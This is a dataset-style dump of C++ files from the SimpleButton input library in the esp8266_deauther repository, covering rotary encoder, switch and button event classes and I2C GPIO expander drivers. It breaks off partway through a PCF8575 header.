language
stringlengths 0
24
| filename
stringlengths 9
214
| code
stringlengths 99
9.93M
|
---|---|---|
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Buttons/RotaryEncoder.cpp | #include "RotaryEncoder.h"
namespace simplebutton {
RotaryEncoder::RotaryEncoder() {
setButtons(NULL, NULL, NULL);
}
RotaryEncoder::RotaryEncoder(uint8_t channelA, uint8_t channelB, uint8_t button) {
setup(channelA, channelB, button);
}
RotaryEncoder::RotaryEncoder(GPIOExpander* pcf, uint8_t channelA, uint8_t channelB, uint8_t button) {
setup(pcf, channelA, channelB, button);
}
RotaryEncoder::RotaryEncoder(Button* clockwise, Button* anticlockwise, Button* button) {
setup(clockwise, anticlockwise, button);
}
RotaryEncoder::~RotaryEncoder() {
if (this->clockwise) delete this->clockwise;
if (this->anticlockwise) delete this->anticlockwise;
if (this->button) delete this->button;
}
void RotaryEncoder::setup(uint8_t channelA, uint8_t channelB, uint8_t button) {
this->clockwise = new ButtonPullup(channelA);
this->anticlockwise = new ButtonPullup(channelB);
this->button = new ButtonPullup(button);
prevA = clockwise->read();
prevB = anticlockwise->read();
}
void RotaryEncoder::setup(GPIOExpander* pcf, uint8_t channelA, uint8_t channelB, uint8_t button) {
this->clockwise = new ButtonPullupGPIOExpander(pcf, channelA);
this->anticlockwise = new ButtonPullupGPIOExpander(pcf, channelB);
this->button = new ButtonPullupGPIOExpander(pcf, button);
prevA = clockwise->read();
prevB = anticlockwise->read();
}
void RotaryEncoder::setup(Button* clockwise, Button* anticlockwise, Button* button) {
setButtons(clockwise, anticlockwise, button);
prevA = clockwise->read();
prevB = anticlockwise->read();
}
void RotaryEncoder::update() {
update(clockwise->read(), anticlockwise->read(), button->read());
}
void RotaryEncoder::update(bool stateA, bool stateB, bool buttonState) {
button->update(buttonState);
if (curState == State::STILL) {
if ((stateA != prevA) && (stateB == prevB)) {
prevA = stateA;
curState = State::ANTICLOCKWISE;
} else if ((stateA == prevA) && (stateB != prevB)) {
prevB = stateB;
curState = State::CLOCKWISE;
}
} else if ((curState != State::STILL) && (stateA == stateB)) {
prevA = stateA;
prevB = stateB;
if (curState == prevState) steps++;
else steps = 1;
if (steps >= button_steps) {
if (curState == State::CLOCKWISE) {
if (!inverted) goClockwise();
else goAnticlockwise();
} else if (curState == State::ANTICLOCKWISE) {
if (!inverted) goAnticlockwise();
else goClockwise();
}
steps = 0;
}
prevState = curState;
curState = State::STILL;
}
}
void RotaryEncoder::reset() {
button->reset();
clockwise->reset();
anticlockwise->reset();
curState = State::STILL;
prevState = State::STILL;
steps = 0;
}
int32_t RotaryEncoder::getPos() {
return pos;
}
void RotaryEncoder::setButtons(Button* clockwise, Button* anticlockwise, Button* button) {
if (this->clockwise) delete this->clockwise;
if (this->anticlockwise) delete this->anticlockwise;
if (this->button) delete this->button;
this->clockwise = clockwise ? clockwise : new Button();
this->anticlockwise = anticlockwise ? anticlockwise : new Button();
this->button = button ? button : new Button();
}
void RotaryEncoder::setPos(int32_t pos) {
this->pos = pos;
}
void RotaryEncoder::setMin(int32_t value) {
this->min = value;
}
void RotaryEncoder::setMax(int32_t value) {
this->max = value;
}
void RotaryEncoder::setEncoding(uint8_t steps) {
if ((steps == 1) || (steps == 2) || (steps == 4)) this->button_steps = steps;
}
void RotaryEncoder::enableLoop(bool loop) {
this->loop = loop;
}
void RotaryEncoder::setInverted(bool inverted) {
this->inverted = inverted;
}
void RotaryEncoder::goClockwise() {
clockwise->click();
anticlockwise->reset();
if (pos < max) pos++;
else if (loop) pos = min;
}
void RotaryEncoder::goAnticlockwise() {
anticlockwise->click();
clockwise->reset();
if (pos > min) pos--;
else if (loop) pos = max;
}
bool RotaryEncoder::clicked() {
return button->clicked();
}
bool RotaryEncoder::incremented() {
return clockwise->clicked();
}
bool RotaryEncoder::decremented() {
return anticlockwise->clicked();
}
bool RotaryEncoder::minVal() {
return pos == min;
}
bool RotaryEncoder::maxVal() {
return pos == max;
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Buttons/RotaryEncoder.h | #ifndef SimpleButton_RotaryEncoder_h
#define SimpleButton_RotaryEncoder_h
#include "Button.h"
#include "ButtonPullup.h"
#include "ButtonGPIOExpander.h"
#include "ButtonPullupGPIOExpander.h"
namespace simplebutton {
class RotaryEncoder {
public:
Button* button = NULL;
Button* clockwise = NULL;
Button* anticlockwise = NULL;
RotaryEncoder();
RotaryEncoder(uint8_t channelA, uint8_t channelB, uint8_t button);
RotaryEncoder(GPIOExpander* pcf, uint8_t channelA, uint8_t channelB, uint8_t button);
RotaryEncoder(Button* clockwise, Button* anticlockwise, Button* button);
~RotaryEncoder();
void setup(uint8_t channelA, uint8_t channelB, uint8_t button);
void setup(GPIOExpander* pcf, uint8_t channelA, uint8_t channelB, uint8_t button);
void setup(Button* clockwise, Button* anticlockwise, Button* button);
void update();
void update(bool stateA, bool stateB, bool buttonState);
void reset();
int32_t getPos();
void setButtons(Button* clockwise, Button* anticlockwise, Button* button);
void setPos(int32_t pos);
void enableLoop(bool loop);
void setEncoding(uint8_t steps);
void setMin(int32_t value);
void setMax(int32_t value);
void setInverted(bool inverted);
bool clicked();
bool incremented();
bool decremented();
bool minVal();
bool maxVal();
private:
int32_t pos = 0;
bool prevA = false;
bool prevB = false;
enum State { STILL = 0, CLOCKWISE = 1, ANTICLOCKWISE = 2 };
State curState = State::STILL;
State prevState = State::STILL;
uint8_t button_steps = 1; // how many steps per turn (encoding)
uint8_t steps = 0; // tmp counter
int32_t min = -128;
int32_t max = 127;
bool loop = false;
bool inverted = false;
void goClockwise();
void goAnticlockwise();
};
}
#endif // ifndef SimpleButton_RotaryEncoder_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Buttons/RotaryEncoderI2C.cpp | #include "RotaryEncoderI2C.h"
namespace simplebutton {
RotaryEncoderI2C::RotaryEncoderI2C() {
setup(0x30);
}
RotaryEncoderI2C::RotaryEncoderI2C(uint8_t i2cAddress) {
setup(i2cAddress);
}
RotaryEncoderI2C::RotaryEncoderI2C(uint8_t i2cAddress, TwoWire* wire) {
setup(i2cAddress, wire);
}
RotaryEncoderI2C::~RotaryEncoderI2C() {}
void RotaryEncoderI2C::setup(uint8_t i2cAddress) {
setup(i2cAddress, &Wire);
}
void RotaryEncoderI2C::setup(uint8_t i2cAddress, TwoWire* wire) {
this->i2cAddress = i2cAddress;
this->wire = wire;
this->clockwise = new Button();
this->anticlockwise = new Button();
this->button = new Button();
setMin(-128);
setMax(127);
begin();
}
bool RotaryEncoderI2C::interrupt() {
if (interruptEnable) return digitalRead(interruptPin) == LOW;
return true;
}
void RotaryEncoderI2C::enableInterrupt(uint8_t pin, bool pullup) {
interruptPin = pin;
interruptEnable = true;
interruptPullup = pullup;
pinMode(pin, INPUT);
}
bool RotaryEncoderI2C::update() {
if (interrupt()) {
readStatus();
if (clicked()) button->click();
if (incremented()) clockwise->click();
if (decremented()) anticlockwise->click();
return true;
}
return false;
}
void RotaryEncoderI2C::begin() {
uint8_t config = 0x00;
if (interruptEnable) config = config | 0x01;
if (ledEnabled) config = config | 0x02;
if (loop) config = config | 0x04;
if (inverted) config = config | 0x08;
if (!interruptPullup) config = config | 0x10;
if (encoding) config = config | 0x20;
setConfig(config);
}
void RotaryEncoderI2C::reset() {
button->reset();
clockwise->reset();
anticlockwise->reset();
setConfig(0x80);
update();
}
bool RotaryEncoderI2C::connected() {
return error == 0;
}
String RotaryEncoderI2C::getError() {
String msg;
switch (error) {
case 0:
msg += "OK";
break;
case 1:
msg += String(F("Data too long to fit in transmit buffer"));
break;
case 2:
msg += String(F("Received NACK on transmit of address"));
break;
case 3:
msg += String(F("Received NACK on transmit of data"));
case 4:
msg += String(F("Unknown transmission error"));
break;
case 5:
msg += String(F("I2C error"));
break;
}
return msg;
}
void RotaryEncoderI2C::setConfig(uint8_t config) {
write(0x00, config);
}
void RotaryEncoderI2C::enableLed(bool led) {
ledEnabled = led;
}
void RotaryEncoderI2C::enableLoop(bool loop) {
this->loop = loop;
}
void RotaryEncoderI2C::setEncoding(uint8_t encoding) {
if (encoding == 1) this->encoding = false;
else if (encoding == 2) this->encoding = true;
}
void RotaryEncoderI2C::setInverted(bool inverted) {
this->inverted = inverted;
}
void RotaryEncoderI2C::setPos(int32_t value) {
write(0x02, value);
}
void RotaryEncoderI2C::setMin(int32_t value) {
write(0x0A, value);
}
void RotaryEncoderI2C::setMax(int32_t value) {
write(0x06, value);
}
void RotaryEncoderI2C::setLed(uint8_t valueA, uint8_t valueB) {
setLedA(valueA);
setLedB(valueB);
}
void RotaryEncoderI2C::setLedA(uint8_t value) {
if (ledEnabled) write(0x0E, value);
}
void RotaryEncoderI2C::setLedB(uint8_t value) {
if (ledEnabled) write(0x0F, value);
}
int32_t RotaryEncoderI2C::getPos() {
return read32(0x02);
}
uint8_t RotaryEncoderI2C::readStatus() {
status = read(0x01);
return status;
}
uint8_t RotaryEncoderI2C::readLedA() {
return read(0x0E);
}
uint8_t RotaryEncoderI2C::readLedB() {
return read(0x0F);
}
int32_t RotaryEncoderI2C::readMax() {
return read32(0x06);
}
int32_t RotaryEncoderI2C::readMin() {
return read32(0x0A);
}
bool RotaryEncoderI2C::clicked() {
return status & 0x01;
}
bool RotaryEncoderI2C::incremented() {
return status & 0x02;
}
bool RotaryEncoderI2C::decremented() {
return status & 0x04;
}
bool RotaryEncoderI2C::minVal() {
return status & 0x10;
}
bool RotaryEncoderI2C::maxVal() {
return status & 0x08;
}
void RotaryEncoderI2C::write(uint8_t address, uint8_t value) {
wire->beginTransmission(i2cAddress);
wire->write(address);
wire->write(value);
error = wire->endTransmission();
}
void RotaryEncoderI2C::write(uint8_t address, int32_t value) {
wire->beginTransmission(i2cAddress);
wire->write(address);
wire->write(((uint32_t)value >> 24) & 0xFF);
wire->write(((uint32_t)value >> 16) & 0xFF);
wire->write(((uint32_t)value >> 8) & 0xFF);
wire->write((uint32_t)value & 0xFF);
error = wire->endTransmission();
}
uint8_t RotaryEncoderI2C::read(uint8_t address) {
uint8_t data = 0xFF;
// ask for some sweet data
wire->beginTransmission(i2cAddress);
wire->write(address);
error = wire->endTransmission();
// read out the sweet data
wire->requestFrom(i2cAddress, (uint8_t)1);
if (wire->available() == 1) {
data = wire->read();
} else {
error = ROTARY_ENCODER_I2C_ERROR;
}
return data;
}
int32_t RotaryEncoderI2C::read32(uint8_t address) {
uint32_t data = 0xFFFFFFFF;
// ask for some sweet data
wire->beginTransmission(i2cAddress);
wire->write(address);
error = wire->endTransmission();
// read out the sweet data
wire->requestFrom(i2cAddress, (uint8_t)4);
if (wire->available() == 4) {
data = wire->read();
data = (data << 8) | wire->read();
data = (data << 8) | wire->read();
data = (data << 8) | wire->read();
} else {
error = ROTARY_ENCODER_I2C_ERROR;
}
return (int32_t)data;
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Buttons/RotaryEncoderI2C.h | #ifndef SimpleButton_RotaryEncoderI2C_h
#define SimpleButton_RotaryEncoderI2C_h
#include "Arduino.h"
#include <Wire.h>
#define ROTARY_ENCODER_I2C_ERROR 5
#include "Button.h"
namespace simplebutton {
class RotaryEncoderI2C {
public:
Button* clockwise = NULL;
Button* anticlockwise = NULL;
Button* button = NULL;
RotaryEncoderI2C();
RotaryEncoderI2C(uint8_t i2cAddress);
RotaryEncoderI2C(uint8_t i2cAddressdress, TwoWire* wire);
~RotaryEncoderI2C();
void setup(uint8_t i2cAddress);
void setup(uint8_t i2cAddress, TwoWire* wire);
bool update();
void begin();
void reset();
bool connected();
String getError();
void setConfig(uint8_t config);
void enableInterrupt(uint8_t pin, bool pullup);
void enableLed(bool led);
void enableLoop(bool loop);
void setEncoding(uint8_t encoding);
void setInverted(bool inverted);
bool interrupt();
void setPos(int32_t value);
void setMin(int32_t value);
void setMax(int32_t value);
void setLed(uint8_t valueA, uint8_t valueB);
void setLedA(uint8_t value);
void setLedB(uint8_t value);
int32_t getPos();
uint8_t readStatus();
uint8_t readLedA();
uint8_t readLedB();
int32_t readMax();
int32_t readMin();
bool clicked();
bool incremented();
bool decremented();
bool minVal();
bool maxVal();
private:
// temp variables
uint8_t status = 0x00;
uint8_t error = 0;
// i2c stuff
uint8_t i2cAddress = 0x00;
TwoWire* wire = NULL;
// config
uint8_t interruptPin = 0;
bool interruptEnable = false; // INTE
bool interruptPullup = true;
bool ledEnabled = false; // LEDE
bool encoding = false; // x1 = false, x2 = true
bool loop = false; // WRAPE
bool inverted = false; // DIRE
// internal functions
void write(uint8_t address, uint8_t value);
void write(uint8_t address, int32_t value);
uint8_t read(uint8_t address);
int32_t read32(uint8_t address);
};
}
#endif // ifndef SimpleButton_RotaryEncoderI2C_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Buttons/Switch.cpp | #include "Switch.h"
namespace simplebutton {
Switch::Switch() {
button = new Button();
}
Switch::Switch(uint8_t pin) {
setup(pin);
}
Switch::Switch(GPIOExpander* pcf, uint8_t pin) {
setup(pcf, pin);
}
Switch::Switch(Button* button) {
setup(button);
}
Switch::~Switch() {
if (this->button) delete this->button;
}
void Switch::setup(uint8_t pin) {
button = new Button(pin);
tmpState = button->read();
}
void Switch::setup(GPIOExpander* pcf, uint8_t pin) {
button = new ButtonGPIOExpander(pcf, pin);
tmpState = button->read();
}
void Switch::setup(Button* button) {
setButton(button);
tmpState = button->read();
}
void Switch::update() {
update(button->read());
}
void Switch::update(bool state) {
bool prevState = tmpState;
tmpState = state > 0;
if (prevState != tmpState) button->click();
}
void Switch::setButton(Button* button) {
if (this->button) delete this->button;
this->button = button ? button : new Button();
}
bool Switch::getState() {
return tmpState;
}
bool Switch::clicked() {
return button->clicked();
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Buttons/Switch.h | #ifndef SimpleButton_Switch_h
#define SimpleButton_Switch_h
#include "Button.h"
#include "ButtonGPIOExpander.h"
namespace simplebutton {
class Switch {
public:
Button* button = NULL;
Switch();
Switch(uint8_t pin);
Switch(GPIOExpander* pcf, uint8_t pin);
Switch(Button* button);
~Switch();
void setup(uint8_t pin);
void setup(GPIOExpander* pcf, uint8_t pin);
void setup(Button* button);
void update();
void update(bool state);
void setButton(Button* button);
bool getState();
bool clicked();
private:
bool tmpState = false;
};
}
#endif // ifndef SimpleButton_Switch_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/ClickEvent.cpp | #include "ClickEvent.h"
namespace simplebutton {
ClickEvent::ClickEvent(ButtonEventFunction, uint32_t minPushTime, uint32_t minReleaseTime) {
this->fnct = fnct;
this->minPushTime = minPushTime;
this->minReleaseTime = minReleaseTime;
}
ClickEvent::~ClickEvent() {
if (next) {
delete next;
next = NULL;
}
}
uint8_t ClickEvent::getMode() {
return MODE::CLICKED;
}
uint32_t ClickEvent::getMinPushTime() {
return minPushTime;
}
uint32_t ClickEvent::getMinReleaseTime() {
return minReleaseTime;
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/ClickEvent.h | #ifndef SimpleButton_ClickEvent_h
#define SimpleButton_ClickEvent_h
#include "Event.h"
namespace simplebutton {
class ClickEvent : public Event {
public:
ClickEvent(ButtonEventFunction, uint32_t minPushTime, uint32_t minReleaseTime);
~ClickEvent();
uint8_t getMode();
uint32_t getMinPushTime();
uint32_t getMinReleaseTime();
private:
uint32_t minPushTime = 0;
uint32_t minReleaseTime = 0;
};
}
#endif // ifndef SimpleButton_ClickEvent_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/DoubleclickEvent.cpp | #include "DoubleclickEvent.h"
namespace simplebutton {
DoubleclickEvent::DoubleclickEvent(ButtonEventFunction, uint32_t minPushTime, uint32_t minReleaseTime,
uint32_t timeSpan) {
this->fnct = fnct;
this->minPushTime = minPushTime;
this->minReleaseTime = minReleaseTime;
this->timeSpan = timeSpan;
}
DoubleclickEvent::~DoubleclickEvent() {
if (next) {
delete next;
next = NULL;
}
}
uint8_t DoubleclickEvent::getMode() {
return MODE::DOUBLECLICKED;
}
uint32_t DoubleclickEvent::getMinPushTime() {
return minPushTime;
}
uint32_t DoubleclickEvent::getMinReleaseTime() {
return minReleaseTime;
}
uint32_t DoubleclickEvent::getTimeSpan() {
return timeSpan;
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/DoubleclickEvent.h | #ifndef SimpleButton_DoubleclickEvent_h
#define SimpleButton_DoubleclickEvent_h
#include "Event.h"
namespace simplebutton {
class DoubleclickEvent : public Event {
public:
DoubleclickEvent(ButtonEventFunction, uint32_t minPushTime, uint32_t minReleaseTime, uint32_t timeSpan);
~DoubleclickEvent();
uint8_t getMode();
uint32_t getMinPushTime();
uint32_t getMinReleaseTime();
uint32_t getTimeSpan();
private:
uint32_t minPushTime = 0;
uint32_t minReleaseTime = 0;
uint32_t timeSpan = 0;
};
}
#endif // ifndef SimpleButton_DoubleclickEvent_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/Event.cpp | #include "Event.h"
namespace simplebutton {
Event::~Event() {
if (next) {
delete next;
next = NULL;
}
}
void Event::run() {
if (fnct) fnct();
}
uint8_t Event::getMode() {
return MODE::NONE;
}
uint32_t Event::getMinPushTime() {
return 0;
}
uint32_t Event::getMinReleaseTime() {
return 0;
}
uint32_t Event::getTimeSpan() {
return 0;
}
uint32_t Event::getInterval() {
return 0;
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/Event.h | #ifndef SimpleButton_Event_h
#define SimpleButton_Event_h
#include "Arduino.h"
#include <functional>
#define ButtonEventFunction std::function<void()>fnct
namespace simplebutton {
class Event {
public:
Event* next = NULL;
enum MODE { NONE = 0, PUSHED = 1, RELEASED = 2, CLICKED = 3, DOUBLECLICKED = 4, HOLDING = 5 };
virtual ~Event();
virtual void run();
virtual uint8_t getMode();
virtual uint32_t getMinPushTime();
virtual uint32_t getMinReleaseTime();
virtual uint32_t getTimeSpan();
virtual uint32_t getInterval();
protected:
ButtonEventFunction = NULL;
};
}
#endif // ifndef Event_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/HoldEvent.cpp | #include "HoldEvent.h"
namespace simplebutton {
HoldEvent::HoldEvent(ButtonEventFunction, uint32_t interval) {
this->fnct = fnct;
this->interval = interval;
}
HoldEvent::~HoldEvent() {
if (next) {
delete next;
next = NULL;
}
}
uint8_t HoldEvent::getMode() {
return MODE::HOLDING;
}
uint32_t HoldEvent::getInterval() {
return interval;
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/HoldEvent.h | #ifndef SimpleButton_HoldEvent_h
#define SimpleButton_HoldEvent_h
#include "Event.h"
namespace simplebutton {
class HoldEvent : public Event {
public:
HoldEvent(ButtonEventFunction, uint32_t interval);
~HoldEvent();
uint8_t getMode();
uint32_t getInterval();
private:
uint32_t interval = 0;
};
}
#endif // ifndef SimpleButton_HoldEvent_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/PushEvent.cpp | #include "PushEvent.h"
namespace simplebutton {
PushEvent::PushEvent(ButtonEventFunction) {
this->fnct = fnct;
}
PushEvent::~PushEvent() {
if (next) {
delete next;
next = NULL;
}
}
uint8_t PushEvent::getMode() {
return MODE::PUSHED;
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/PushEvent.h | #ifndef SimpleButton_PushEvent_h
#define SimpleButton_PushEvent_h
#include "Event.h"
namespace simplebutton {
class PushEvent : public Event {
public:
PushEvent(ButtonEventFunction);
~PushEvent();
uint8_t getMode();
};
}
#endif // ifndef SimpleButton_PushEvent_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/ReleaseEvent.cpp | #include "ReleaseEvent.h"
namespace simplebutton {
ReleaseEvent::ReleaseEvent(ButtonEventFunction) {
this->fnct = fnct;
}
ReleaseEvent::~ReleaseEvent() {
if (next) {
delete next;
next = NULL;
}
}
uint8_t ReleaseEvent::getMode() {
return MODE::RELEASED;
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/Events/ReleaseEvent.h | #ifndef SimpleButton_ReleaseEvent_h
#define SimpleButton_ReleaseEvent_h
#include "Event.h"
namespace simplebutton {
class ReleaseEvent : public Event {
public:
ReleaseEvent(ButtonEventFunction);
~ReleaseEvent();
uint8_t getMode();
};
}
#endif // ifndef SimpleButton_ReleaseEvent_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/libs/GPIOExpander.cpp | #include "GPIOExpander.h"
namespace simplebutton {
void GPIOExpander::setup(uint8_t address) {
this->wire = &Wire;
this->address = address;
write(0);
}
void GPIOExpander::setup(uint8_t address, TwoWire* wire) {
this->wire = wire;
this->address = address;
write(0);
}
bool GPIOExpander::connected() {
return error == 0;
}
String GPIOExpander::getError() {
String msg;
switch (error) {
case 0:
msg += String(F("OK"));
break;
case 1:
msg += String(F("Data too long to fit in transmit buffer"));
break;
case 2:
msg += String(F("Received NACK on transmit of address"));
break;
case 3:
msg += String(F("Received NACK on transmit of data"));
case 4:
msg += String(F("Unknown transmission error"));
break;
case 5:
msg += String(F("Pin error"));
break;
case 6:
msg += String(F("I2C error"));
break;
}
return msg;
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/libs/GPIOExpander.h | #ifndef SimpleButton_GPIOExpander_h
#define SimpleButton_GPIOExpander_h
#include "Arduino.h"
#include <Wire.h>
#define PCF_PIN_ERROR 5
#define PCF_I2C_ERROR 6
namespace simplebutton {
class GPIOExpander {
public:
virtual ~GPIOExpander() = default;
virtual void setup(uint8_t address);
virtual void setup(uint8_t address, TwoWire* wire);
virtual int read() = 0;
virtual int read(uint8_t pin) = 0;
virtual void write(int value) = 0;
virtual void write(uint8_t pin, bool value) = 0;
virtual void toggle() = 0;
virtual void toggle(uint8_t pin) = 0;
virtual bool connected();
virtual String getError();
protected:
uint8_t error = 0;
TwoWire* wire;
uint8_t address;
};
}
#endif // ifndef SimpleButton_GPIOExpander_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/libs/MCP23017.cpp | #include "MCP23017.h"
namespace simplebutton {
MCP23017::MCP23017(uint8_t address) {
setup(address);
}
MCP23017::MCP23017(uint8_t address, TwoWire* wire) {
setup(address, wire);
}
MCP23017::~MCP23017() {}
void MCP23017::setup(uint8_t address) {
setup(address, &Wire);
}
void MCP23017::setup(uint8_t address, TwoWire* wire) {
this->address = address;
this->wire = wire;
setIO();
setPullups();
}
int MCP23017::read() {
this->pinData = readRegister16(0x12); // 0x12 = GPIOA
return this->pinData;
}
int MCP23017::read(uint8_t pin) {
if (pin >= 16) {
error = PCF_PIN_ERROR;
return 0;
}
// make sure the pin is set to be an input
if (getPinMode(pin) == OUTPUT) {
bool pullup = getPinState(pin);
setPinMode(pin, pullup ? INPUT_PULLUP : INPUT);
}
return (read() >> pin) & 0x1;
}
void MCP23017::write(int value) {
// make sure all pins are set as outputs
for (int i = 0; i < 16; i++) {
bool output = (value >> i) & 0x1;
if (output && (getPinMode(i) != OUTPUT)) setPinMode(i, OUTPUT);
}
this->pinData = value;
writeRegister(0x12, value); // 0x12 = GPIOA
}
void MCP23017::write(uint8_t pin, bool value) {
if (pin >= 16) {
error = PCF_PIN_ERROR;
return;
}
if (getPinState(pin) != value) toggle(pin);
}
void MCP23017::toggle() {
pinData = ~pinData;
write(pinData);
}
void MCP23017::toggle(uint8_t pin) {
if (pin >= 16) {
error = PCF_PIN_ERROR;
return;
}
pinData ^= 1 << pin;
write(pinData);
}
void MCP23017::setIO() {
writeRegister(0x00, this->pinModes); // 0x00 = IODIRA register
}
void MCP23017::setPullups() {
writeRegister(0x0C, this->pinPullups); // 0x0C = GPPUA register
}
void MCP23017::setPinMode(uint8_t pin, uint8_t mode) {
if (pin >= 16) {
error = PCF_PIN_ERROR;
return;
}
if (getPinMode(pin) == mode) return;
bool input = (mode == INPUT || mode == INPUT_PULLUP);
bool pullup = (mode == INPUT_PULLUP);
bitWrite(pinModes, pin, input);
bitWrite(pinPullups, pin, pullup);
setIO();
setPullups();
}
uint8_t MCP23017::getPinMode(uint8_t pin) {
if (pin >= 16) {
error = PCF_PIN_ERROR;
return 0;
}
bool input = (this->pinModes >> pin) & 0x1;
bool pullup = (this->pinPullups >> pin) & 0x1;
if (!input) return OUTPUT;
if (pullup) return INPUT_PULLUP;
return INPUT;
}
bool MCP23017::getPinState(uint8_t pin) {
if (pin >= 16) {
error = PCF_PIN_ERROR;
return false;
}
return (pinData >> pin) & 0x1;
}
uint8_t MCP23017::readRegister8(uint8_t address) {
wire->beginTransmission(this->address);
wire->write(address);
error = wire->endTransmission();
wire->requestFrom(this->address, (uint8_t)1);
if (wire->available() == 1) {
return wire->read();
} else {
error = PCF_I2C_ERROR;
return 0;
}
}
uint16_t MCP23017::readRegister16(uint8_t address) {
wire->beginTransmission(this->address);
wire->write(address);
error = wire->endTransmission();
wire->requestFrom(this->address, (uint8_t)2);
if (wire->available() == 2) {
uint16_t dataA = wire->read();
uint16_t dataB = wire->read();
return (dataB << 8) | dataA;
} else {
error = PCF_I2C_ERROR;
return 0;
}
}
void MCP23017::writeRegister(uint8_t address, uint16_t value) {
wire->beginTransmission(this->address);
wire->write(address);
wire->write(value & 0xFF);
wire->write(value >> 8);
error = wire->endTransmission();
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/libs/MCP23017.h | #ifndef SimpleButton_MCP23017_h
#define SimpleButton_MCP23017_h
#include "GPIOExpander.h"
namespace simplebutton {
class MCP23017 : public GPIOExpander {
public:
MCP23017(uint8_t address);
MCP23017(uint8_t address, TwoWire* wire);
~MCP23017();
void setup(uint8_t address);
void setup(uint8_t address, TwoWire* wire);
int read();
int read(uint8_t pin);
void write(int value);
void write(uint8_t pin, bool value);
void toggle();
void toggle(uint8_t pin);
private:
uint16_t pinData = 0x0000;
uint16_t pinModes = 0x0000;
uint16_t pinPullups = 0x0000;
void setIO();
void setPullups();
void setPinMode(uint8_t pin, uint8_t mode);
uint8_t getPinMode(uint8_t pin);
bool getPinState(uint8_t pin);
uint8_t readRegister8(uint8_t address);
uint16_t readRegister16(uint8_t address);
void writeRegister(uint8_t address, uint16_t value);
};
}
#endif // ifndef SimpleButton_MCP23017_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/libs/PCF8574.cpp | #include "PCF8574.h"
namespace simplebutton {
PCF8574::PCF8574(uint8_t address) {
setup(address);
}
PCF8574::PCF8574(uint8_t address, TwoWire* wire) {
setup(address, wire);
}
PCF8574::~PCF8574() {}
int PCF8574::read() {
wire->requestFrom(address, (uint8_t)1);
data = 0;
if (wire->available() >= 1) {
data = wire->read();
} else {
error = PCF_I2C_ERROR;
}
return data;
}
int PCF8574::read(uint8_t pin) {
if (pin < 8) {
data = read();
return (data & (1 << pin)) > 0;
} else {
error = PCF_PIN_ERROR;
return -1;
}
}
void PCF8574::write(int value) {
wire->beginTransmission(address);
pinModeMask &= 0xff00;
pinModeMask |= value;
data = pinModeMask;
wire->write(data);
error = wire->endTransmission();
}
void PCF8574::write(uint8_t pin, bool value) {
if (pin >= 8) {
error = PCF_PIN_ERROR;
return;
}
if (value) pinModeMask |= value << pin;
else pinModeMask &= ~(1 << pin);
write(pinModeMask);
}
void PCF8574::toggle() {
pinModeMask = ~pinModeMask;
write(pinModeMask);
}
void PCF8574::toggle(uint8_t pin) {
if (pin < 8) {
pinModeMask ^= 1 << pin;
write(pinModeMask);
} else {
error = PCF_PIN_ERROR;
}
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/libs/PCF8574.h | #ifndef SimpleButton_PCF8574_h
#define SimpleButton_PCF8574_h
#include "GPIOExpander.h"
namespace simplebutton {
class PCF8574 : public GPIOExpander {
public:
PCF8574(uint8_t address);
PCF8574(uint8_t address, TwoWire* wire);
~PCF8574();
int read();
int read(uint8_t pin);
void write(int value);
void write(uint8_t pin, bool value);
void toggle();
void toggle(uint8_t pin);
private:
uint8_t data;
uint8_t pinModeMask;
};
}
#endif // ifndef SimpleButton_PCF8574_h |
C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/libs/PCF8575.cpp | #include "PCF8575.h"
namespace simplebutton {
PCF8575::PCF8575(uint8_t address) {
setup(address);
}
PCF8575::PCF8575(uint8_t address, TwoWire* wire) {
setup(address, wire);
}
PCF8575::~PCF8575() {}
int PCF8575::read() {
wire->requestFrom(address, (uint8_t)2);
data = 0;
if (wire->available() >= 2) {
data = wire->read();
data |= wire->read() << 8;
}
return data;
}
int PCF8575::read(uint8_t pin) {
data = read();
return (data & (1 << pin)) > 0;
}
void PCF8575::write(int value) {
wire->beginTransmission(address);
pinModeMask = value;
data = pinModeMask;
wire->write((uint8_t)data);
wire->write((uint8_t)(data >> 8));
wire->endTransmission();
}
void PCF8575::write(uint8_t pin, bool value) {
if (value) pinModeMask |= value << pin;
else pinModeMask &= ~(1 << pin);
write(pinModeMask);
}
void PCF8575::toggle() {
pinModeMask = ~pinModeMask;
write(pinModeMask);
}
void PCF8575::toggle(uint8_t pin) {
pinModeMask ^= 1 << pin;
write(pinModeMask);
}
} |
C/C++ | esp8266_deauther-2/esp8266_deauther/src/SimpleButton/libs/PCF8575.h | #ifndef SimpleButton_PCF8575_h
#define SimpleButton_PCF8575_h
#include "GPIOExpander.h"
namespace simplebutton {
class PCF8575 : public GPIOExpander {
public:
PCF8575(uint8_t address);
PCF8575(uint8_t address, TwoWire* wire);
~PCF8575();
int read();
int read(uint8_t pin);
void write(int value);
void write(uint8_t pin, bool value);
void toggle();
